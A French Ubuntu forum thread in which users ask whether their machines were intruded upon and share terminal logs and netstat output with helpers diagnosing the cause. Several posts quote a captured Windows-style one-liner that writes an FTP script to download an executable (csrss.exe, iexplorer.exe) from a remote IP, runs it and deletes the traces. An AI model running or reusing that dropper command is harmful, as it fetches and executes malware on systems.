Contenu | Rechercher | Menus

Annonce

Si vous avez des soucis pour rester connecté, déconnectez-vous puis reconnectez-vous depuis ce lien en cochant la case
Me connecter automatiquement lors de mes prochaines visites.

À propos de l'équipe du forum.

#1 Le 27/02/2013, à 10:14

solho

Intrusion?

Bonjour à tous,

Je viens vers vous pour savoir si mon PC n'aurait pas été "visité" à l'insu de mon plein gré...

Le Contexte:

Mon PC s'allume automatiquement vers 7h, puis lance la session Ubuntu 12.10( connection automatique au démarrage). Les progs qui se lancent au démarrage sont Dropbox, cairo-dock, et ce matin le gestionnaire de MàJ (je ne parle pas des services et autres que je ne connais pas).

Ce qui m'ennuie, c'est qu'avec cairo-dock, j'ai une petite fenêtre de terminal qui s'affiche et qui contenait ces lignes ce matin, au lieu de l'habituel 'solho@solho-V-M4A3000E:~$':

[5] 4004
[6] 4005
[7] 4006
ftp: s: unknown option
Commande 'del' non trouvée, vouliez-vous dire :
Commande 'del' non trouvée, vouliez-vous dire :
 La commande 'mdel' du paquet 'mtools' (main)
 La commande 'delp' du paquet 'fp-utils-2.6.0' (universe)
 La commande 'wdel' du paquet 'wput' (universe)
 La commande 'el' du paquet 'oneliner-el' (universe)
 La commande 'mdel' du paquet 'mtools' (main)
csrss.exe : commande introuvable
 La commande 'delp' du paquet 'fp-utils-2.6.0' (universe)
 La commande 'tel' du paquet 'orville-write' (universe)
 La commande 'wdel' du paquet 'wput' (universe)
 La commande 'deal' du paquet 'deal' (universe)
 La commande 'el' du paquet 'oneliner-el' (universe)
 La commande 'hdel' du paquet 'hfsutils' (main)
 La commande 'tel' du paquet 'orville-write' (universe)
 La commande 'bel' du paquet 'belier' (universe)
 La commande 'deal' du paquet 'deal' (universe)
 La commande 'qdel' du paquet 'torque-client' (universe)
 La commande 'hdel' du paquet 'hfsutils' (main)
 La commande 'qdel' du paquet 'gridengine-client' (universe)
 La commande 'bel' du paquet 'belier' (universe)
 La commande 'qdel' du paquet 'slurm-llnl-torque' (universe)
 La commande 'qdel' du paquet 'torque-client' (universe)
 La commande 'qdel' du paquet 'torque-client-x11' (universe)
 La commande 'qdel' du paquet 'gridengine-client' (universe)
 La commande 'qdel' du paquet 'slurm-llnl-torque' (universe)
del : commande introuvable
 La commande 'qdel' du paquet 'torque-client-x11' (universe)
del : commande introuvable
[2]   Fini                    echo open 190.24.211.230 10699 >> eq
[3]   Fini                    echo user 18653 9875 >> eq
[2]   Fini                    echo open 190.24.211.230 10699 >> eq
[3]   Fini                    echo user 18653 9875 >> eq
[4]   Fini                    echo get csrss.exe >> eq
[5]   Fini                    echo quit >> eq
[6]-  Termine 1               ftp -n -s:eq
solho@solho-V-M4A3000E:~$ [2]   Fini                    echo open 190.24.211.230 10699 >> eq

[1]-  Termine 127             del eq
[7]+  Termine 127             csrss.exe
solho@solho-V-M4A3000E:~$ 

Je ne fais pas de ftp consciemment, hormis Dropbox, je ne vois pas...

Une recherche sur l'IP me mêne en Colombie, chez "Corporativos24211-230.etb.net.co"??? et
Informations relevées Le 27-02-2013 à 08:17:09
Zone Géographique : Amérique Latine et Iles des Caraïbes
Pays de Connexion : COLOMBIA 
Ville de Connexion : Indéterminé
FAI : Inconnu
Réseau : Indéterminé

De plus csrss.exe etant plutot windowsien, je ne vois pas ce qu'il vient faire ici... J'ai bien un autre PC  XP branché sur Ubuntu via reminna mais je lance la connection manuellement et elle n'était pas lancée à ce moment...


Mes Questions:

Qu'est-ce que c'est que ce truc???
Est-ce grave, Docteur?
AI-je une grosse faille de sécurité sur mon PC?

PS: je ne relance pas le PC malgré mise à jour, si quelqu'un voudrait des logs particuliers.

Merci d'avance pour votre aide et éclaircissements

Dernière modification par solho (Le 27/02/2013, à 10:15)


Don't Worry... Be Linux!
Ubuntu 10.10 & 11.04
quelques mémentos.

Hors ligne

#2 Le 27/02/2013, à 10:48

pires57

Re : Intrusion?

netstat -tanu 

te donnera quelque infos. essaye de le lancer sans programme qui utilise le réseau (skype, firefox ... )


Utilisateur d'Archlinux, Ubuntu et Kali Linux
Administrateur système et réseau spécialisé Linux.
LinkedIn

Hors ligne

#3 Le 27/02/2013, à 11:21

solho

Re : Intrusion?

Merci de te pencher sur ce problème et de me donner quelques pistes d'investigations... Commande lancée seulement avec dropbox et Remmina, le gestionnaire de MàJ n'est pas fermé non plus.

solho@solho-V-M4A3000E:~$ netstat -tanu
Connexions Internet actives (serveurs et établies)
Proto Recv-Q Send-Q Adresse locale          Adresse distante        Etat      
tcp        0      0 0.0.0.0:139             0.0.0.0:*               LISTEN     
tcp        0      0 0.0.0.0:5900            0.0.0.0:*               LISTEN     
tcp        0      0 127.0.1.1:53            0.0.0.0:*               LISTEN     
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN     
tcp        0      0 127.0.0.1:631           0.0.0.0:*               LISTEN     
tcp        0      0 0.0.0.0:17500           0.0.0.0:*               LISTEN     
tcp        0      0 0.0.0.0:445             0.0.0.0:*               LISTEN     
tcp        1      0 192.168.1.3:39571       91.189.89.144:80        CLOSE_WAIT 
tcp        0      0 192.168.1.3:42421       173.194.45.41:443       TIME_WAIT  
tcp        0      0 192.168.1.3:32816       192.168.1.4:5900        TIME_WAIT  
tcp        0      0 192.168.1.3:39433       199.47.216.147:80       ESTABLISHED
tcp        0      0 192.168.1.3:48387       173.194.78.125:5222     TIME_WAIT  
tcp        0      0 192.168.1.3:54720       192.168.1.4:17500       ESTABLISHED
tcp6       0      0 :::5800                 :::*                    LISTEN     
tcp6       0      0 :::139                  :::*                    LISTEN     
tcp6       0      0 :::5900                 :::*                    LISTEN     
tcp6       0      0 :::22                   :::*                    LISTEN     
tcp6       0      0 ::1:631                 :::*                    LISTEN     
tcp6       0      0 :::445                  :::*                    LISTEN     
udp        0      0 127.0.1.1:53            0.0.0.0:*                          
udp        0      0 192.168.1.255:137       0.0.0.0:*                          
udp        0      0 192.168.1.3:137         0.0.0.0:*                          
udp        0      0 0.0.0.0:137             0.0.0.0:*                          
udp        0      0 192.168.1.255:138       0.0.0.0:*                          
udp        0      0 192.168.1.3:138         0.0.0.0:*                          
udp        0      0 0.0.0.0:138             0.0.0.0:*                          
udp        0      0 0.0.0.0:48199           0.0.0.0:*                          
udp        0      0 0.0.0.0:17500           0.0.0.0:*                          
udp        0      0 0.0.0.0:5353            0.0.0.0:*                          
udp6       0      0 :::41799                :::*                               
udp6       0      0 :::5353                 :::*                               
solho@solho-V-M4A3000E:~$ 

Les IP hors réseau local semble correspondre à Dropbox et Google inc., rien de suspect à priori...
Je vais essayer de voir si je peux retrouver l'historique du terminal de Cairo-dock, car je ne retrouve pas d'autre commandes que celle que j'ai pu taper dans Terminal en faisant la flèche "up"...


Don't Worry... Be Linux!
Ubuntu 10.10 & 11.04
quelques mémentos.

Hors ligne

#4 Le 27/02/2013, à 11:29

Le grand Rorh Sha

Re : Intrusion?

Shalut.

Ça ressemble à quelqu'un qui voudrait infecter un PC Windows à distance, mais comment aurait-il pu avoir un accès à une machine Linux sans le savoir ?


0110110001100101 0110011101110010011000010110111001100100 01010010011011110111001001101000 010100110110100001100001

Hors ligne

#5 Le 27/02/2013, à 11:36

J5012

Re : Intrusion?

le compte dropbox pourrait avoir ete compromis ? si le win xp demarre manuellement y a laisse des traces, cela aurait pu laisser penser a "l'attaquant" que c'etait la machine principale ...

Hors ligne

#6 Le 27/02/2013, à 11:44

solho

Re : Intrusion?

Bon, on va peut-être y voir plus clair, je viens de trouver et lancer la commande "history":

solho@solho-V-M4A3000E:~$ history
    1  papsd machinarium
    2  padsp machinarium
    3  fsdisk -l
    4  fdisk -l
    5  sudo fdisk -l
    6  sudo add-apt-repository ppa:webupd8team/haguichi && sudo apt-get update && sudo apt-get install haguichi
    7  open-ssh
    8  openssh
    9  ssh
   10  open_ssh config
   11  open-ssh
   12  Open-ssh
   13  OpenSSH
   14  sshd
   15  sudo apt-get install openssh-server
   16  haguichi
   17  configure hamachi
   18  hamachi
   19  hamachi leave
   20  hamachi logoff
   21  hamachi logon
   22  hamachi
   23  hamachi command
   24  hamachi join 143-610-542
   25  hamachi do-join 143-610-542
   26  hamachi logoff
   27  sudo apt-get install chkconfig
   28  sudo apt-get -f install chkconfig
   29  man apt-get
   30  ape-get search chkconfig
   31  apt-get search chkconfig
   32  apt-get --search chkconfig
   33  man apt-get
   34  sudo testdisk
   35  sudo apt-get install testdisk
   36  sudo testdisk
   37  sudo add-apt-repository ppa:cairo-dock-team/ppa
   38  sudo apt-get update
   39  sudo apt-get install cairo-dock cairo-dock-plug-ins
   40  exit
   41  toonloop
   42  man ffmpeg
   43  exit
   44  sudo apt-get install mixxx
   45  exit
   46  htop
   47  top
   48  libreoffice
   49  sudo apt-get install htop
   50  htop
   51  clear
   52  dir
   53  sudo chown -R solho:solho /Dropbox
   54  sudo chown -R solho:solho :home/solho/Dropbox
   55  sudo chown -R solho:solho /home/solho/Dropbox
   56  clear
   57  sudo haltnow
   58  sudo halt
   59  %systemroot%\system32\cmd.exe
   60  del eq&echo open 190.24.211.230 10699 >> eq&echo user 18653 9875 >> eq &echo get csrss.exe >> eq &echo quit >> eq &ftp -n -s:eq &csrss.exe &del eq
   61  history
solho@solho-V-M4A3000E:~$ 

Bien, jusqu'à n°58, il y a de forte chance que ce soit mon oeuvre, par contre ensuite...


Don't Worry... Be Linux!
Ubuntu 10.10 & 11.04
quelques mémentos.

Hors ligne

#7 Le 27/02/2013, à 11:49

Henry de Monfreid

Re : Intrusion?

Salut, y aurait pas un kévin qui aurait eu un accès physique à ta machine ?


« Je te hais plus qu'aucun des dieux qui vivent sur l'Olympe
Car tu ne rêves que discordes, guerres et combats. »
Trouble obsessionnelcompulsif
Le TdCT est revenu (ils reviennent tous)

Hors ligne

#8 Le 27/02/2013, à 12:30

pires57

Re : Intrusion?

Salut, y aurait pas un kévin qui aurait eu un accès physique à ta machine ?

tu m'as bien fait rire la ^^


Utilisateur d'Archlinux, Ubuntu et Kali Linux
Administrateur système et réseau spécialisé Linux.
LinkedIn

Hors ligne

#9 Le 27/02/2013, à 12:35

tiramiseb

Re : Intrusion?

À première vue, il semblerait que "quelqu'un" ait réussi à faire exécuter des commandes locales sur ton ordinateur, en croyant que c'est un Windows, ces commandes exécutant un programme chelou téléchargé en FTP sur un serveur en Colombie.

Sa tentative de faire tourner son ".exe" a échoué c'est sûr, par contre il est rentré d'une manière ou d'une autre.

Peux-tu exécuter la commande suivante ?

sudo netstat -tlnpu

Hors ligne

#10 Le 27/02/2013, à 14:58

Henry de Monfreid

Re : Intrusion?

pires57 a écrit :

Salut, y aurait pas un kévin qui aurait eu un accès physique à ta machine ?

tu m'as bien fait rire la ^^

Mine de rien, pourquoi pas ?

C'est plus facile que de d'avoir un accès à distance, surtout sur une machine qui s'allume toute seule.

Un type qui obtient un accès ssh à une machine sans savoir que c'est du Linux puis qui tape des commandes DOS, j'y crois moyennement.

Pour moi, le petit cousin en vacances qui voit le PC de tonton allumé et qui suit le dernier tuto de hacker news mag, c'est possible.

On peut aussi envisager une clé USB avec un autorun lancé par wine. Ou encore une pièce-jointe vérolée.


« Je te hais plus qu'aucun des dieux qui vivent sur l'Olympe
Car tu ne rêves que discordes, guerres et combats. »
Trouble obsessionnelcompulsif
Le TdCT est revenu (ils reviennent tous)

Hors ligne

#11 Le 27/02/2013, à 16:05

pires57

Re : Intrusion?

On peut aussi envisager une clé USB avec un autorun lancé par wine. Ou encore une pièce-jointe vérolée.

Effectivement, c'est une hypothèse.
Pour l'autre j'y crois moyen, faut être abruti pour ne pas se rendre compte que le système n'est pas sous windows....


Utilisateur d'Archlinux, Ubuntu et Kali Linux
Administrateur système et réseau spécialisé Linux.
LinkedIn

Hors ligne

#12 Le 27/02/2013, à 18:08

solho

Re : Intrusion?

Re... Excusez mon retard, mais boulot boulot avant tout...

Bien, je clarifie un peu les chose, les 2 pc sont dans un batiment d'élevage, et aucun "Kevin" n'est passé par là (aucune trace sur cam ip) en dehors des heures d'ouverture...

@tiramiseb, les résultats de la commande

solho@solho-V-M4A3000E:~$ sudo netstat -tlnpu
[sudo] password for solho: 
Connexions Internet actives (seulement serveurs)
Proto Recv-Q Send-Q Adresse locale          Adresse distante        Etat       PID/Program name
tcp        0      0 0.0.0.0:139             0.0.0.0:*               LISTEN      978/smbd        
tcp        0      0 0.0.0.0:5900            0.0.0.0:*               LISTEN      1964/vino-server
tcp        0      0 127.0.1.1:53            0.0.0.0:*               LISTEN      1433/dnsmasq    
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      981/sshd        
tcp        0      0 127.0.0.1:631           0.0.0.0:*               LISTEN      1063/cupsd      
tcp        0      0 0.0.0.0:17500           0.0.0.0:*               LISTEN      1997/dropbox    
tcp        0      0 0.0.0.0:445             0.0.0.0:*               LISTEN      978/smbd        
tcp6       0      0 :::5800                 :::*                    LISTEN      1964/vino-server
tcp6       0      0 :::139                  :::*                    LISTEN      978/smbd        
tcp6       0      0 :::5900                 :::*                    LISTEN      1964/vino-server
tcp6       0      0 :::22                   :::*                    LISTEN      981/sshd        
tcp6       0      0 ::1:631                 :::*                    LISTEN      1063/cupsd      
tcp6       0      0 :::445                  :::*                    LISTEN      978/smbd        
udp        0      0 127.0.1.1:53            0.0.0.0:*                           1433/dnsmasq    
udp        0      0 192.168.1.255:137       0.0.0.0:*                           1571/nmbd       
udp        0      0 192.168.1.3:137         0.0.0.0:*                           1571/nmbd       
udp        0      0 0.0.0.0:137             0.0.0.0:*                           1571/nmbd       
udp        0      0 192.168.1.255:138       0.0.0.0:*                           1571/nmbd       
udp        0      0 192.168.1.3:138         0.0.0.0:*                           1571/nmbd       
udp        0      0 0.0.0.0:138             0.0.0.0:*                           1571/nmbd       
udp        0      0 0.0.0.0:48199           0.0.0.0:*                           1025/avahi-daemon: 
udp        0      0 0.0.0.0:17500           0.0.0.0:*                           1997/dropbox    
udp        0      0 0.0.0.0:5353            0.0.0.0:*                           1025/avahi-daemon: 
udp6       0      0 :::41799                :::*                                1025/avahi-daemon: 
udp6       0      0 :::5353                 :::*                                1025/avahi-daemon: 
solho@solho-V-M4A3000E:~$ 

Normalement, ma box fait office de firewall, j'ai fait les reglages pour pouvoir me connecter à distance via mon smartphone (pc xp, cam ip, et mais je n'y arrive plus depuis que j'ai changé mon smartphone, pc linux via open ssh )


Don't Worry... Be Linux!
Ubuntu 10.10 & 11.04
quelques mémentos.

Hors ligne

#13 Le 09/10/2014, à 01:12

jmarshallh

Re : Intrusion?

Bonsoir
pour rebondir sur ce sujet, je crois qu'il m'est arrivé le meme genre de trucs ....
quelqu'un peut il m'eclaircir :
voici le topo :

j'ai Ubuntu 12.04 LTS qui tournait, relié via Vnc viewer ouvert sous mon PC win7,
je m'appretais à aller eteindre ma machine ubuntu (qui me sert de serveur apache pour owncloud ) et j'ai trouvé ca sur mon prompt :

jmarshallh@jmarshallh-ASUS:~$ 7~
7~ : commande introuvable
jmarshallh@jmarshallh-ASUS:~$ %systemroot%\system32\cmd.exe
bash: fg: %systemroot%system32cmd.exe : tâche inexistante
jmarshallh@jmarshallh-ASUS:~$ del eq&echo open 192.168.137.145 13742 >> eq&echo user 14972 11168 >> eq &echo get iexplorer.exe >> eq &echo quit >> eq &ftp -n -s:eq &iexplorer.exe &del eq
[1] 3813
[2] 3814
[3] 3815
[4] 3817
[5] 3818
[6] 3819
[7] 3820
ftp: s: unknown option
Commande 'del' non trouvée, vouliez-vous dire :
La commande 'mdel' du paquet 'mtools' (main)
La commande 'delp' du paquet 'fp-utils-2.4.4' (universe)
La commande 'el' du paquet 'oneliner-el' (universe)
La commande 'tel' du paquet 'orville-write' (universe)
La commande 'deal' du paquet 'deal' (universe)
La commande 'hdel' du paquet 'hfsutils' (main)
La commande 'bel' du paquet 'belier' (universe)
La commande 'qdel' du paquet 'slurm-llnl-torque' (universe)
La commande 'qdel' du paquet 'gridengine-client' (universe)
La commande 'qdel' du paquet 'torque-client-x11' (universe)
La commande 'qdel' du paquet 'torque-client' (universe)
del : commande introuvable
Commande 'del' non trouvée, vouliez-vous dire :
La commande 'mdel' du paquet 'mtools' (main)
La commande 'delp' du paquet 'fp-utils-2.4.4' (universe)
La commande 'el' du paquet 'oneliner-el' (universe)
La commande 'tel' du paquet 'orville-write' (universe)
La commande 'deal' du paquet 'deal' (universe)
La commande 'hdel' du paquet 'hfsutils' (main)
La commande 'bel' du paquet 'belier' (universe)
La commande 'qdel' du paquet 'slurm-llnl-torque' (universe)
La commande 'qdel' du paquet 'gridengine-client' (universe)
La commande 'qdel' du paquet 'torque-client-x11' (universe)
La commande 'qdel' du paquet 'torque-client' (universe)
del : commande introuvable
[1]   Termine 127             del eq
[2]   Fini                    echo open 192.168.137.145 13742 >> eq
[3]   Fini                    echo user 14972 11168 >> eq
[4]   Fini                    echo get iexplorer.exe >> eq
[5]   Fini                    echo quit >> eq
[6]-  Termine 1               ftp -n -s:eq
jmarshallh@jmarshallh-ASUS:~$
jmarshallh@jmarshallh-ASUS:~$ iexplorer.exe : commande introuvable
7~

le gars il a essayé de faire quoi en fait ?
rapport quelconque avec Vnc viewer installé sur mon win7 ?
bot ? ou intrusion ?
pour le moment je ne vais toucher à rien sur mes configs ,  rien de tres confidentiel dans mes machines ....
je surveille ca de pres ,
please help me !!

Dernière modification par jmarshallh (Le 09/10/2014, à 01:15)

Hors ligne

#14 Le 09/10/2014, à 06:37

tiramiseb

Re : Intrusion?

Bonjour jmarshallh,

le gars il a essayé de faire quoi en fait ?

Aucune idée mais il croyait être sur un Windows.
On dirait qu'il a voulu télécharger une version vérolée d'Internet Explorer pour la placer sur ton PC. Ça

rapport quelconque avec Vnc viewer installé sur mon win7 ?

Si quelqu'un a pu avoir accès à ton Windows, alors il a pu croire que c'est une invite de commande de Windows.

bot ? ou intrusion ?

Difficile à dire comme ça.
Ta machine est-elle à jour ?

Dans ton cas, c'est l'utilisation d'une adresse IP locale qui m'étonne. Tu connais des adresses locales en 192.168.137.x ?

Dernière modification par tiramiseb (Le 09/10/2014, à 08:25)

Hors ligne

#15 Le 09/10/2014, à 08:25

tiramiseb

Re : Intrusion?

jmarshallh, tu as créé un autre fil de discussion sur le même sujet :
http://forum.ubuntu-fr.org/viewtopic.php?pid=18240241

Dans la mesure où il est préférable de garder un problème par discussion, je ne te répondrai plus ici, je répondrai sur ton propre fil de discussion.

Hors ligne